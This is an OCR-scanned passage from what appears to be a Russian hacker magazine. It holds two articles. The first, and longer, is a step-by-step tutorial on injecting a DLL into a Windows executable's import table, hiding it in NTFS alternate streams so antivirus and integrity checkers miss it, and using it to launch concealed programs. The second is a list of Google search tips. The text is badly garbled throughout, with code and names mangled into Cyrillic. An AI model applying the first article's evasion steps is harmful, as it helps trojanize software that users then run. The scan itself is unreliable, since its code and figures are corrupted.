гинальную точку входа (Огідіпаі Епіту Роіпі, или 
сокращенно ОЕР) запускаемого ехе-файла. 
Таким образом, если мы добавим втаблицу 
импорта подопытного ехе-файла свою БИ, про- 
блема внедрения Х-кода будетуспешно решена. 
Самое замечательное, что БББ может быть 
написана на любом языке (хоть на ассемблере, 
хоть на БЕБРНІ) и совершенно неподвластна 
антивирусам, поскольку они органически не- 
способны распознавать неизвестную заразу. Ах 
да... Эвристические анализаторы. Но эти штуки 
очень легко обойти (чему посвящено множество 
статей, втом числе и моих, которые можно найти 
на ЬирѴ/пегиті.огд.ги ). 

□ Подготовка кэкспериментам 

Прежде чем вторгаться в базовые структуры РЕ- 
файла, неплохо бы получить общее представле- 
ние о его устройстве. В М5БЫ входитспеци- 
фикация на РЕ-формат (« М ісгозобі; РогІаЫе 
ЕхесиіаЫеапсІ Соттоп ОЬіесі Еііе Еогтаі 
Эресібсабоп»), написанная на враждебном для 
нас английском языке и ориентированная пре- 
имущественно на честных программистов. Мы- 
щъх исправил этот недостаток, переведя специ- 
фикацию на русский язык и переориентировав 
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ее на хакеров. Электронная копия доступна для 
бесплатной скачки по адресу Ыір У/пеги ті.огд. 
ги/зоигіг/РЕ-сІезс-п-іпіесІ.гір и на диске. 

Ок, теперь подготовим «дрозофилу», предна- 
значенную для внедрения Х-кода. 

Ее пример, написанный на языке Си, 
приведен ниже: 

ФАЙЛ-«ДР030ФИЛА» ІШЕСТ.С, ПРЕДНА- 
ЗНАЧЕННЫЙ ДЛЯ ВНЕДРЕНИЯ Х-КОДА 

#іпс1и<3е <збс!іо.]т> 

таіп ( ) 

{ 

// выводим что-нибудь на экран 
ргіпбб ( " I 'ш пегитіХп" ) ; 

} 

Компилируем ее любым подходящим компиля- 
тором (например, в случае Місгозо^ Ѵізиаі С++ 
командная строка будет вы гл я деть так: 

«$с1.ехе іпіесЕс»]. После этого на диске обра- 
зуется файл іщесКехе, при запуске выдающий 
на экран следующее приветствие (обращаем 
внимание, что это консольная программа, 
которая должна запускаться из-под РАР'а или 
штатного командного интерпретатора стб.ехе; 
при запуске из проводника окно консоли авто- 
матически закроется сразу же после заверше- 
ния программы, и мы ни хвоста не увидим): 

РЕЗУЛЬТАТ РАБОТЫ ПРОГРАММЫ-ДРО- 
ЗОФИЛЫ» ДО ВНЕДРЕНИЯ Х-КОДА 

$іпдесб . ехе 

I 'ш пегиші 

Разобравшись с «дрозофил ой», займемся 
подготовкой динамической библиотеки, то есть 
того самого Х-кода, который мы будем внедрять 
внутрь іщесСехе. В простейшем случае исход- 
ный код будет выглядетьтак: 



ИСХОДНЫЙ КОД ДИНАМИЧЕСКОЙ БИБЛИО- 
ТЕКИ ІШЕСТЕО_ОІ_І_.С, ПОДГОТОВЛЕННОЙ 
КВНЕДРЕНИЮ 

#іпс1ибе <збс1іо.Ъ.> 

#іпс1ибе <ѵ\/іпс!оѵѵз . Ъ> 

/* создаем фиктивную экспортиру- 
емую функцию, которую потом будет 
импортировать «дрозофила» */ 

бесізрес (бііехрогб ) іпб 

бшшпу ( ) { гебигп 0 ; } 

/* точка входа в 611, получающая 
управление при различных обстоя- 
тельствах */ 

ВООЬ ѴШІАРІ БІІМаіп (НІЫ8ТА1МСЕ 
ЫпзбБЬЬ , ШЮКБ ІбѵгВеазоп, ЬРѴОІБ 
ІрѵКезегѵеб) 

{ 

// приветствие, выводимое до 
запуска «дрозофилы» 

іб (1б™Кеазоп==ВЬЬ_РКОСЕ83_ 
АТТАСН ) ргіпбб ( "Ьеііо , ѵгогісі! \ 



п") ; 

// приветствие, выводимое пе- 
ред завершением работы 
«дрозофилы» 

іб (16ілКеазоп==ВЬЬ_РК0СЕ83_ 
БЕТАСН) ргіпбб ( "доо6-Ьуе,ѵ^ог16! \ 
п") ; 

} 

Обрати внимание, что ОІІМаіп, в отличие от 
ЕпігуРоіпІ, вызывается многократно: а) при 
подключении к процессу; б) при заверше- 
нии процесса или выгрузки динамической 
библиотеки АРІ-функцией РгееЫЬгагу; в) при 
создании процессом нового потока; г) при 
завершении одного из существующих потоков 
процесса. Другими словами, РИМаіп позволяет 
отслеживать определенные системные собы- 
тия и адекватно реагировать на них. В данном 
случае мы выводим «Ьеііо, ѵѵогісі!» перед 
запуском «дрозофилы» и «дооб-Ьуе, ѵѵогісі!» 
перед завершением ее работы. 

Компиляция динамической библиотеки осу- 
ществляется следующим образом: 

«$с1.ехе іп]ес!есІ_сІЦ.с/ЕВ», где ключ ‘/Ю’ сооб- 
щает компилятору, что необходимо сгенериро- 
вать именно ОН, а не ЕХЕ (какэто происходит 
поумолчанию). 

О Внедрение Х-ОІ_І_ втаблицу 
импорта «дрозофилы» 

Берем в свои загребущие лапы Ьіеѵѵ, открыва- 
ем файл іщесбехе, переходим в Ьех-режим по 
<ЕЫТЕР>, давим <Б8> для отображения РЕ- 
заголовка, нажимаем <Б10> (Оіг) и среди прочих 
элементов ІМА6Е_0АТА_0ІРЕСТ0РУ выбираем 
секцию импорта (Ігттрогі), расположенную в 
нашем случае по РѴА-адресу, равному 54846, 
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> На диске тебя ждут 
все упомянутые инс- 
трументы, примеры, 
компилятор Си для 
сборки приведен- 
ного кода, а также 
подборка готовых 
джойнеров. 



_ ... \ 




> Не вздумай исполь- 
зовать этот прием в 
противозаконных 
целях. В противном 
случае ни автор, ни 
редакции, ни кто- 
либо другой, кроме 
тебя, ответственнос- 
ти не несет. 




> Поиск указателя на таблицу импорта в Ьіеѵѵ'е и в РЕ-файле 



и раскинувшуюся в ширину на целых 286 байт. Клавиша 
<ЕЫТЕР> переносит нас к структуре Ітрогі Оігесіогу ТаЫе, о 
которой мы поговорим чуть позже. А пока обсудим, как найти 
указатель на Ітрогі Оігесіогу ТаЫе при отсутствии Ьіеѵѵ'а. 
Двойное слово, лежащее по смещению 806 от начала РЕ- 
заголовка (легко опознаваемого визуально по сигнатуре РЕ), 
и есть РѴА-адрес, указывающий на Ітрогі ОігесіогуТаЫе, 
а следующее двойное слово хранит ее размер. Такчто для 
поиска таблицы импорта Ьіеѵѵсовсем необязателен. 

Таблица импорта представляет собой достаточно сложное 
сооружение иерархического типа. Вершину иерархии зани- 
мает структура Ітрогі ОігесіогуТаЫе, фактически являюща- 
яся массивом подчиненных структуртипа I МАО Е_І М РО РТ_ 
0Е5СРІРТ0Р, каждая из которых содержит РѴА-указатель 
на имя загружаемой динамической библиотеки, ссылки 
на ОгідіпаІЕігзіТИипк и ЕігзіТЬипк с именами/ординалами 
импортируемых функций (причем поле ОгідіпаІЕігвіТИипк 
не является обязательным и можетбыть равно нулю). Два 
других поля — ТітеОаІеЗіатр (временная отметка) и 
ЕогѵѵагбегСЬаіп (форвардинг) — также необязательны, и 
потому для подключения своей собственной ОЕЕ нам необ- 
ходимозаполнить всего лишьдва поля структуры ІМА6Е_ 
ІМР0РТ_0Е5СРІРТ0Р: ІЧате и ЕігзіТИипк, атакже создать 
таблицу Ітрогі АббгеввТаЫе (сокращено ІАТ), импортирую- 
щую по меньшей мере одно имя (в данном случае бит ту). 



ПРОТОТИП СТРУКТУРЫ ІМАѲЕ_ІМР0КТ_0Е5СКІРТ0К 

ЦуресбеТ зСгисС _ІМАСЕ_ІМРОКТ_БЕЗСКІРТОК { 
ипіоп { 

БЖЖБ СЬагаскегізкісз ; //0 Тог 
ДегшіпаДіпд пиіі ітрогі: сіезсгірког 
БЖЖБ ОгідіпаІЕігзкТЫітк; // КѴА До 
огідіпаі ипЪоипс! ІАТ 
} ; 

БШОКБ ТітеБаДеЗДатр; // ТітеБаДеЗДатр 



БЖЖХ) Еогѵ^агсіегСЬаіп; // -1 ІТ по 
ТогмагсЗегз 

БШОКБ Ыате; // пате оТ Дііе <Т11 

БШЕБ ЕігзДТЬипк; // КѴА До ІАТ 
} ІМАСЕ_ІМРОКТ_БЕЗСКІРТОК; 

Если вместо стройной иерархии структур в нашей голове 
образовалась каша, не стоит волноваться — это нормально! 
Постепенно она утрясется и все структуры встанут на свои 
места, так что оставим их дозревать, а сами сосредоточим- 
ся натекущих проблемах. Чтобы внедрить Х-ОбЬ в Ітрогі 
ОігесіогуТаЫе, необходимо добавитьеще один экземпляр 
структуры ІМА6Е_ІМР0РТ_0Е5СРІРТ0Р. Но просто так 
сделать это не получится, поскольку сразу же за концом 
Ітрогі ОігесіогуТаЫе начинается ІАТ первой динамической 
библиотеки и нам просто некуда втиснуться, если, конечно, 
не перенести Ітрогі ОігесіогуТаЫе в какое-нибудь другое 
место! Ачто?! И перенесем! 

Повторяем описанную последовательность действий с 
Ьіеѵѵ'ом еще раз, идя в начало табл ицы импорта (аточнее, 
как мы уже знаем, на первый элемент Ітрогі Оігесіогу 
ТаЫе), давим <Ѳгау-*> («звездочку» на цифровой клавиа- 
туре) и, перемещаясь курсорными клавишами, выделяем 
бордовым цветом 28Ь байт (размер Ітрогі ОігесіогуТаЫе). 
После этого давим <Ѳгау-*> еще раз и, нажав <Е2>, сохра- 
няем блок в файл, для определенности назвав его ібі-огд. 
Теперь, прокручивая файл, клацаем <РадеОоѵѵп> до тех 
пор, пока не выйдем на оперативный простор свободного 
места, оккупированного длинной вереницей нулей. В 
нашем случае это место располагается по адресу 40581 Об, 
непосредственно за концом таблицы импорта. 

Далее нам необходимо скопироватьоригинальную Ітрогі 
ОігесіогуТаЫе на новое место, не забыв при этом заре- 
зервировать место для одного элемента структуры типа 
I МАО Е_І М РО РТ_0 Е5С Р I РТ О Р , в который мы чуть позже 
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>Свободное место за концом таблицы импорта, пригодное для перемещения Ітрогі 
ОігесІогуТаЫе 



поместим нашу динамическую библиотеку. 
Она будет п рои ни циа лизирована самой 
первой, что оченьполезнодляборьбысан- 
тивирусами, иммунизирующими ехе-файлы 
путем прививки им специальной сШ-вакцины, 
выполняющей проверку целостности содер- 
жимого образа исполняемого файла. 
Поскольку, как нетрудно подсчитать, размер 
структуры I МАѲЕ_ІМ Р0РТ_0 ЕЭС РІ РТОВ 
составляет 146 байт, а незанятая область 
начинается с адреса 40581 Об, мы должны 
передвинуть курсор по адресу 4058246, 
нажать <6гау-*>, выделить 286 байт (размер 
оригинальной Ітрогі Оігесіогу ТаЫе) и на- 
жать <Ѳгау-*> еще раз, а потом обязательно 
переместить курсор в начало выделенного 
блока. Далее жмем <СМ-Р2> (Ѳеі Віоск), 
вводим имя файла, в который мы только что 
сохранили блок, — ісй-огд и считываем его с 
диска. 

Теперь возвращаемся в начало файла и 
корректируем РѴА-адрестаблицы импорта, 
который в данном случае составит 58246. У 
тебя может возникнуть вопрос: почему 58246, 
а не 4058246?! Да потому, что РѴА-адреса 
получаются путем вычитания базового адреса 
(прописанного в заголовке РЕ-файла и в 
нашем случае равного 4000006) из вирту- 
ального адреса (равного 4058246). Причем с 
учетом порядка старшинства байт, принятого 
на процессорах х86 (младшие биты распо- 
лагаются по меньшим адресам), мы должны 
записать 24 58, а не 58 24, как делают многие 
начинающие хакеры, удивляясь потом, почему 
оно не работает. 

Значит, открываем файл іщесі.ехе в біеѵѵ'е, 
находим РЕ-сигнатуру, опускаем курсор вниз на 
806 байт, видимтам 84 54, нажимаем <ЕЗ> для 
разрешения редактирования, меняем адрес 
на 2458, сохраняем изменения по <Е9> и выхо- 
дим... за пивом. Пиво для хакеров — это святое! 
Проверяем работоспособность файла — а 



вдругона пострадала?! Запускаем іщесі. 
ехе и, если все операции были проделаны 
правильно, на экране появится триумфальное 
приветствие. В противном же случае система 
откажется загружать файл или выбросит 
исключение. 

Смочив пересохшее горло, приступаем ксамой 
сложной и самой ответственной части — запол- 
нению структуры I МАѲЕ І М РО РТ й ЕБС РІ РТОР. 
Начнем стого, что переместим курсор в конец 
Ітрогі ОігесіогуТаЫе, подогнав его кадресу 
4058506, и запишем имя функции-пустышки 
(битту), оканчивающееся нулем и предваренное 
двумя нулями, а следом за ним — имя внедряемой 
динамической библиотеки іп)ес1:еб_бІЫЦ. Впро- 
чем, порядок их расположения можетбыть и 
другим, системномузагрузчику натакие мелочи 
уже давно положить. 

Сделав это, перемещаемся на первый байт, 
ранее зарезервированный нами для структуры 
ІМАѲЕ_ІМР0РТ_0Е5СРІРТ0Р, и начинаем 
колдовать. Первое двойное слово оставляем 
равным нулю. За ним идут4 байта, отведенные 
для ТітейаіаЗіатр, и мы, желая слегка поиз- 
вращаться, занесем сюда ІАТ, то есть двойное 
слово, содержащее РѴА-адрес импортируемой 
функции. В нашем случае эта функция зовется 
битту, а ее имя (предваренное двумя нулями!) 
начинается с РѴА-адреса 58506. Учитывая 
обратный порядок байт на х86, пишем: 

50 58. Пропустив следующее двойное слово 
(ЕогѵѵагбегСбаіп), в поле Ыа те записываем 
РѴА-адрес имени внедряемой динамической 
библиотеки Іпіес*еб_б11.б11, в нашем случае рав- 
ный 58586. Остается заполнить последнее поле 
— ІтроН АббгеззТаЫе, содержащее РѴА-адрес 
таблицы ІАТ, размещенной нами поверх поля 
ТітеОаіеЗіатр с РѴА-адресом, равным 58146. 
Вот, собственно говоря, и все. 

Остается сущая мелочь. Надо вернуться в 
начало файла, отсчитать от РЕ-заголовка 806 
байт, исправив указатель на таблицу импор- 



Заметай за собой следы 
(для грамотных парней) 

Некоторые файлы (особенноупакованные 
протекторами) скрупулезно следят за своей це- 
лостностью и на попытку внедрения реагируют, 
прямо скажем, не совсем адекватно. Однако 
поскольку Х-ОЕЕ получаетуправление раньше 
остальных, она может восстановить таблицу им- 
порта в памяти, как будто всетак и было, словно к 
ней никто и не прикасался. Для этого достаточно 
вызывать АРІ -функцию ѴіііиаІРгоіесІ, присвоив 
соответствующим регионами памяти атрибут 
РАѲЕ_ПЕАОѴѴПІТЕ, восстановить таблицу 
импорта (оригинал которой легко сохранить в 
Х-ОЩ а затем зановоустановитьатрибут РА6Е_ 
РЕАВОМБУ с помощью всетой же ѴіііиаІРгоІесІ. 
Болеетого, Х-ВИ_ может выделить блок памяти 
из кучи с помощью АРІ-функции ѴігШаІАІІос и 
скопировать туда свое тело, которое, естествен- 
но, должно быть полностью перемещаемо, то 
есть сохранять работоспособность независимо 
от базового адреса загрузки. Далее остается 
только выгрузить ставшую ненужной Х-ВИ вы- 
зовом Р ге е Б і Ь га гу (натот случай, если какой-то 
хитрый механизм проверки целостности решит 
перечислить списокза груженных модулей). 
Маленькийтехнический нюанс: на процессо- 
рах с поддержкой битов МХ/ХЕ), запрещающий 
исполнение кода в страницах памяти, не име- 
ющих соответствующих атрибутов, выделяе- 
мому блоку памяти следует присвоить атрибут 
РА6Е_ЕХЕСІІТЕ_РЕАВѴѴРІТЕ. В противном 
случае, если у пользователя задействован ап- 
паратный ВЕРдля всех приложений (а нетолько 
для системных компонентов, какэто происходит 
поумолчанию), вместо выполнения машинного 
кода система выбросит исключение, и выполне- 
ние троян изирова иной программы завершится в 
аварийном режиме. 



та с 58246 на 581 06 и увеличив ее размер до 
ЗС6. Сохраняем проделанные изменения и, 
набрав побольше воздуха в грудь, запускаем 
файл іпіесБехе: 

ДЕМОНСТРАЦИЯ РАБОТЫ ВНЕДРЕННОЙ 
ДИНАМИЧЕСКОЙ БИБЛИОТЕКИ 

$іпзесО . ехе 
Беііо , ѵѵогісі! 

I ' ш пегиті 
доосІ-Ъуе , ѵѵогісі ! 

Это работает! Причем не просто работает, а 
очень даже хорошо работает. Внедренная 
динамическая библиотека послушно выводит 
« 6 е Но , ѵѵогісі!» еще до запуска файла-«дрозо- 
филы» и «дооб-Ьуе, ѵѵогісі!» непосредственно 
перед ее завершением! Красота! Воттолько... 
посторонняя ВИ нам очень сильно мешает, 
вызывая естественное желание задвинуть ее 
куда-нибудь подальше. И тут мы плавно пере- 
ходим ко второй части нашего рассказа. 
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Пересчет СПС 

В заголовке РЕ-файла имеется специальное 
поле, содержащее контрольную сумму. В по- 
давляющем большинстве случаев оно равно 
нулю, но если это нетак, то после вмешатель- 
ства в таблицу импорта контрольную сумму 
необходимо пересчитать. Этим занимается 
утилита ЕОІТВІТ.ЕХЕ, запущенная с ключом 
'/РЕБЕА5Е'. Она входит как в штатную постав- 
ку компилятора Місгозой ѴізиаІЗІисІіо, так и 
в Ріа^огт 5БК,такчто проблем сее поиском 
возникнуть не должно. Но если они все-таки 
возникнут, можно попробовать просто обну- 
лить контрольную сумму. В некоторых случаях 
это прокатывает, но не всегда. 




> Сохранение оригинальной Ітрог* йігесіогу ТаЫе в файл ісіі-огд 



□ Копирование Х-01_І_ в ЫТРБ-зІгеат 

Файловая система ЫТЕ5 выгодно отличается от 
ЕАТ'атем, что поддерживает потоки (Бігеатз). 

Их еще называют атрибутами (аІПгіЬіЛез), но 
чтобы не путать их с атрибутами типа «только 
на чтение», мы будем придерживаться первого 
термина. Каждый файл имеет минимум один 
безымянный поток, хранящий актуальные 
данные файла. Именно его размер высвечивает 
проводник ѴѴіпсіоѵѵб и продвинутые файловые 
менеджеры типа ЕАР'а. Однако мы можем 
создавать и дополнительные потоки, отделяя 
их имя от имени файла знаком двоеточия 
(«:»), например: ту_б[е:ту_5ігеат1 , ту_ІіІе: 
ту_5ігеат2. Штатные средства ѴѴІпсіоѵѵб не 
поддерживают работу с именованными пото- 
ками, и потому добраться до их содержимого не 
так-то просто. Не существует никакой (стандарт- 
ной) возможности определить, имеетли данный 
файл именованные потоки или нет. 

Чувствуешь, куда я клоню? Давай спрячем Х-БББ 
внутрь іп|’есЕехе, поместив ее в именованный 
поток. Внимание! Это совсем нето же самое, что 
тупо склеить два файла, как поступает большинство 
джойнеров. При копировании Х-йББ в І\ІТР5-поток, 
видимый размер«дрозофилы»неувеличива- 
ется, и при открытии файла іщесЕехе функцией 
Іореп(«іпіесЕехе»,«гЬ»), никаких следов присутс- 
твия Х-ОБЕ в ней не окажется! Более того, при пере- 
даче файла через бир для проверки антивирусной 
службой в опііпе, передается только безымянный 
поток (содержащий полезную программу без 
Х-БББ), и, естественно, антивирусы в ней ничего не 
обнаружат. Кстати говоря, большинство антиви- 
русов сканирует толь ко безымянный поток! Так что 
Х-0І_І_ может чувствовать себя в относительной 
безопасности, тепле, сухости и комфорте. 

Расклад ясен? Тогда действуем. Открываем 
іщесТехе в Ьіеѵѵ'е, привычным движением 
переходим ктаблице импорта: <ЕІ\ІТЕН>, <Б8>, 
<Б1 0>, <стрелка «вниз»>, <ЕІ\ІТЕН>. Меняем имя 
динамической библиотеки Іп]ес1:ес1_с111.с111 на 



іщесі.ехе:х.сіи, где іщесТехе — имя подопытного 
файла, в который мы собираемся внедрить 
Х-ОШ, а х.сШ — имя самой внедряемой 
динамической библиотеки. 

Теперь необходимо скопировать Іп]ес1:ес1_с111. 

СІИ в Іщес1;.ехе:х.сіи, что легко осуществитьс по- 
мощью ЕАР'а. Подогнав курсор кдинамической 
библиотеке Іп|есіесі_с111.с111, нажимаем <5Ыи-Е5> 
и пишем «іщесиехе:х.сіи». Все! Позаверше- 
нии копирования исходную динамическую 
библиотеку Іщес1:ес1_сіи. СІИ можно удалить. 
Больше она нам не понадобится. Кстати говоря, 
размер файла іщесТехе после создания нового 
именованного потока неувеличился ни на байт! 
Дисковые ревизоры (вместе с прочими система- 
ми контроля) тут просто отдыхают. 
Теперьзапускаем файл іщесТехе иубеждаемся, 
что его работоспособность в результате послед- 
них манипуляций ничуть не пострадала. 

□ Переход от теории к практике 

Внедрение своей собственной динамической 
библиотеки — это, конечно, оченьхорошо, но 
на практике гораздо чаще приходится стал- 
киваться стем, что требуется внедрить чужой 
исполняемый файл. Что делать?! Преобразо- 
вывать его в БЕЕ?! Конечно же нет! Доста- 
точно просто слегка доработать нашу X- ВЕБ, 
научив ее запускать ехе-файлы посредством 
АРІ-функции С геаЕе Рі Іе , при этом сами ис- 
полняемые файлы можно (и нужно) поместить 
в именованные ЫТЕЭ-потоки, число которых 
фактически неограниченно. Причем если 
внедряемый ехе тащит за собой динамичес- 
кие библиотеки или другие компоненты, они 
также могутбыть внедрены в ІЧТЕЭ-потоки (естес- 
твенно, в текущем каталоге их уже не окажется, и 
потому исполняемый файл придется подвергнуть 
правке на предметизменения всех путей). Еслиже 
этот файл упакован (а большинство боевых утилит 
типа систем удаленного администрирования редко 
поставляются в открытом виде), наша Х-БББ может 



перехватить АРІ-функции С геа1:е Рі Іе/Боа сі Бі Ь га гу, 
автоматически отслеживания обращения к 
отсутствующим файлам и подсовывая вместо них 
соответствующие им именованные КІТЕБ-потоки. 
Другой немаловажный момент. Отправляя 
ехе-файл с внедренной в негоХ-ОЕЕ 
по почте, записывая его на лазерный диск 
или любой другой не ЫТЕЭ-носитель, мы 
теряем все именованные потоки, и программа 
тутже отказывает в работе, ругаясь на то, что 
не может найти сИЕ 

Ситуация кажется критической, можно даже 
сказать, драматической, нона помощь приходит 
благородный архиватор РАР, обладающий уни- 
кал ьной способностью сохранять все имеющиеся 
в файле ІЧТББ-потоки. Запускаем РАР, выбираем 
іпіесЕехе, нажимаем кнопку «Добавить» (или давим 
<СТРЕ-А>), после чего в свойствах архива взводим 
галочку «Сохранять файловые потоки» (вкладка 
«Дополнительно»). Также при желании можно 
с озд ать 5 ЕХ- а рх и в н а тот с л у ч а й , ес л и у п ол у ч ател я 
не окажется РАР'а, но это уже технические детали. 
Повторяем процедуру пересылки файла по 
электронной почте еще раз, распаковываем 
полученный архив, запускаем ІпіесЕехе, 
и... о чудо! Он работает! 

□ Заключение 

Технологии внедрения в исполняемые файлы 
не стоят на месте и развиваются вместе с 
защитными механизмами и операционными 
системами. Извечная проблема меча и щита 
— кто усовершенствуется первым. Использо- 
вание готовых утилит, работающих в полно- 
стью автоматическом режиме, во-первых, не- 
престижно, а во-вторых, слишком ненадежно. 
Разработчики антивирусов даром свой хлеб 
не едят! Чтобы не погореть на мелочах, весьХ- 
код следует писать самостоятельно. До тех пор 
пока он существует в единственном экземп- 
ляре, у защитных систем не остается никакого 
шанса предотвратить атаку! ИНИ 
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Со стороны многое кажется предельно простым и понятным, любая проблема — пус- 
тяковой, а задача — решаемой. Но стоит взяться за дело самому, как тут же возникает 
куча подводных камней и всяческих непоняток. Вот взять хотя бы поиск в интернете: что 
может быть проще? Каждый может ввести в браузере лѵллг\ѵ.§оо§1е.сот и воспользоваться 
прелестями поисковой системы, но почему-то найти то, что надо, удается далеко не всем. 
А все потому, что любой инструмент нужно использовать со знанием дела и подчас самый 
простой из них оказывается намного мощнее, чем все думают. Да тот же самый Соо§1е! 



ожно легко найти реферат по биологии, не особо 
заморачиваясь по поводу ключевых слов и не имея 
даже малейшего представления о модификаторах, 
кардинально влияющих на результаты поиска. Но 
если речь идето чем-то специфическом, а времени на поиск 
катастрофически мало, забывать о тонкостях поисковой сис- 
темы просто непростительно. Впрочем, хитрости поиска — это 
далеко не все, о чем мы хотим рассказать тебе в этой статье. 




АЛОГИЧЕСКОЕ «ИЛИ» 

Первое, что нужно запомнить, — принципы 
обработки ключевых слов. Поумолчанию 
к каждому ключевому слову поисковая 
система применяет операцию логического 
«И». Это значит, что на запрос «Хакер крутой 
журнал» боодіе выдаст только те страницы, 
которые одновременно будут содержать 
и слово «Хакер», и «крутой», и «журнал». 
Проблема в том, что далеко не всегда это 
является обязательным условием. Если тре- 
буется найти страницы, включающие хотя бы 
одно из слов, нужно поставить между ними 
оператор ОН. 

Пример: хакер крутой ОР жалкий журнал 

2. ТОЧНОЕ СОВПАДЕНИЕ 

Сложные алгоритмы поиска Ѳоодіе учитывают 
морфологию языка, различные особенности 



построения веб-документа и вовсе не пред- 
полагают, что найденные страницы будут 
содержать в точности ту фразу, которая указана в 
строке запроса. Слова могутбыть разбросаны по 
всей странице и даже иметь другую форму, что в 
большинстве случаев оченьудобно. Но что если 
требуется именноточное совпадение? Скажем, 
нужно найти текст песни по одной известной 
строке? В этом случае надо заключить нужные 
слова в кавычки. 

Пример: "опе сгіиз" 

3, ПЛЮСЫ ВАЖНЫХ СЛОВ 

Чтобы сделать акцент на одно или несколько 
ключевых слов, поставь перед ними знак«+». 
Это поможет системе понять, какие из ключевых 
слов наиболее важные, и сформулировать 
результаты поиска болееточно. 

Пример: хакер+журнал 



4, УБИРАЕМ ЛИШНЕЕ 

Полученные результаты нередко засоряет какая- 
то лишняя информация. Чтобы нетратить время 
на ее просмотр, советую наложить на результаты 
поиска фильтр. Сделать это несложно. Надо 
л ишьуказать «слова-паразиты», поставив перед 
нимизнак«-» — и включающие их страницы 
будут тутже исключены из результатов поиска. 
Пример: журнал хакер-ламер 

5, ПОИСК ПО КОНКРЕТНОМУ САЙТУ 

Часто бываетситуация, когда ты точно знаешь, что 
нужная информация есть на конкретном сайте, ноты 
никакие можешьее найти. Тут волей-неволей начи- 
наешьзадумываться об эффективном поиске, ноне 
встроенными средствами сайта (подчасабсолютно 
бестолковыми), а мощными механизмам боодіе. 

И, вобщем-то, проблемы в этом нет, если взять на 
вооружение модификатор зііеіБогшезііе. сот. 
Пример: В одном из номеров у нас был материал 
«Соодіе-Ііаск». Его в момент можно найти, на- 
брав в боодіе "Соодіе-Ьаск" зііе:ѵѵѵѵѵѵ.хакер.ги». 

6, УЧИТЫВАЕМ НАЗВАНИЕ ДОКУМЕНТА 

Намного большей эффективности поиска 
удается добиться, если с помощью модифика- 
тора іпііііе указать слова, которые обязательно 
должны входить в заголовокдокумента. 

Пример: іп(іие:статьи 5ІІе:ѵѵѵѵѵѵ.хакер.ги 
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ПОЛЕЗНЫЕ ТІР5 Ы ТРІС5 НА КАЖДЫЙ ДЕНЬ 



секрета 

(лоо§1е 




«В июле 2006 года Охіогсі Еп^НзЬ Бісілопагу, являющий- 
ся одним из самых авторитетных словарей английского 
языка, добавил в свое последнее издание слово «Соо^іе» 
в значении «искать информацию в интернете». Так 



«і 



Соо§1е» официально стало английским словом» 



7. ЗНАЙ КОНКУРЕНТОВ В ЛИЦО 

Лучший способ найти дружественные (и 
конкурирующие) сайты — спросить об этом 
боодіе. В ответ на модификатор геІа!есІ:<ІІВІ_ 
сайта> он с радостью выдаст сайты со схожей 
тематикой и контентом. 

Пример: На запрос «геІаІесЬѵѵѵѵѵѵ.хакер. 
ги» системы выдаст линки на уѵуууѵ. 
зесигНуІаЬ.ги , ѵтуѵ.зесигкуіосиз.сот 
и прочие проекты по информационной 
безопасности. 

а КТО НА НАС ССЫЛАЕТСЯ? 

Можно использовать Ѳоодіе и для того, чтобы 
проверить популярность конкретного проекта. 
Так, модификатор Ііпк: < 61 РІ_ сайта > отобразит 
все страницы, которые ссылаются на этот ре- 
сурс. Логика простая: чем их больше, тем ресурс 
популярнее. 

Пример: 1іпк:ѵѵѵѵѵѵ.хакер.ги 

9. ИСПОЛЬЗУЙ СИНОНИМЫ 

боодіе знает, что такое синонимы! Если 
хочешь, чтобы в результаты вошли страницы 
не только с конкретным указанным словом, 
ноисе го синонимами, поставь перед ним 
знак «~». 

Пример: іросі -Ьаскіпд 



ЖКАК НАЙТИ КОНКРЕТНЫЙ ТИП 
ДОКУМЕНТА 

Еслиты ищешь конкретныйтип документа, не стесняй- 
ся сказать об этом боодіе. Будь это обычная страница, 
презентация, РОЕ или что-либо еще — можно найти 
все что угодно, при помощи модификатора іііеіуре:. 

Пример: "ЗОЫпіесІіоп" ШеІуре:рсН. В ответ 
система выдаст ссылки на РОР-документы по 
ЗОЫпіесІіоп. 

Г НЕЗАБЫВАЙ ПРОЧИСЛОВЫЕ 
ДИАПАЗОНЫ 

Редко используемый, но реально полезный прием. 
Возьми на вооружение модификатор «X.. У», поз- 
воляющий указать числовой диапазон. Ситуаций, 
когда та кие ухищрен ия могут понадобиться, масса! 

Пример: хакер 2000. .2002 

ЖБЫСТРЫЙ КАЛЬКУЛЯТОР 

Для выполнения громоздких вычислений совсем 
не обязательно елозить мышкой и тыкать кнопки 
в глупом ѴѴІпсІоѵѵз-калькуляторе. Просто введи 
математическое выражение (с любым количес- 
твом действий и скобок) в боодіе — итотбыстро 
все посчитает. Болеетого, поисковик можно 
использовать какудобный конвертер валют! 
Примері: 31337-3.141/87 
Пример 2: 600 1150 іп РУР 



К СЛОВАРЫЕРМИНОВ 

Чтобы быстро найти определения какого- 
либотермина, используется модифика- 
тор беііпе:. Тот же самый результат ты 
получишь, если перед словом поставишь 
человеческие фразы «ѵѵбаі ів» или «что 
такое». 

Пример: с1е!іпе:ЮАР 

и ПРОСМОТРЩИКУМЕРШИХ САЙТОВ 

Бывает, обратишься на сайт, а он в дауне. Что 
делать? Не один раз в подобной ситуации меня 
выручал кэш боодіе, в котором хранится огром- 
ное количество документов. Действовать нужно 
так: сначала набираешь нужный ІІРБ в строке 
запроса, а потом кликаешь «бохранено в кэше» 
на странице результатов. Вуаля! 

15Л1 ЕРЕВЕДИ ЛЮБУЮ СТРАНИЦУ 

Мало кто знаето существовании замечательного 
сервиса для перевода веб-страниц Іга пзіаіе. 
доодіе.сот . Это был бы еще один ресурс для ба- 
нального перевода иностранного контента, если 
бы свою руку к нему не приложил боодіе. Нет, он 
не будет обрабатывать тексты как профессионал- 
переводчик. Но зато в случае проблем даст поль- 
зователю возможность разобраться со смыслом 
фразы или предложения самому. Переведенная 
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> Система сама предлагает наиболее часто используе- 




> С помощью всплывающих подсказоклегко посмотреть, кактекст выглядел в 



мые слова для поиска, продолжая твою мысль 



оригинале 



страница какобычно выводится на экран, но юзер 
всегда может навести мышку на сомнительный 
отрывок и с помощью всплывающей подсказки 
узнать, какфраза звучала в оригинале. 



1] ПОЧТИ 3 ГБ ДЛЯХРАНЕНИЯ ФАЙЛОВ 

Ты уже успел оценить функциональность и 
продуманность почтового сервиса боодіе 
Маіі ( ѵѵѵѵѵѵ.дтаіі.сот )? Тогда тебе опреде- 



торыхты забыл) и организует их по визуаль- 
ным альбомам. А чтобы залить нужные фотки 
в инет, потребуется лишь пару раз кликнуть 
мышкой. 



«Соо§1е ежедневно регистрирует около 50 миллионов 
поисковых запросов и индексирует более 8 миллиардов 
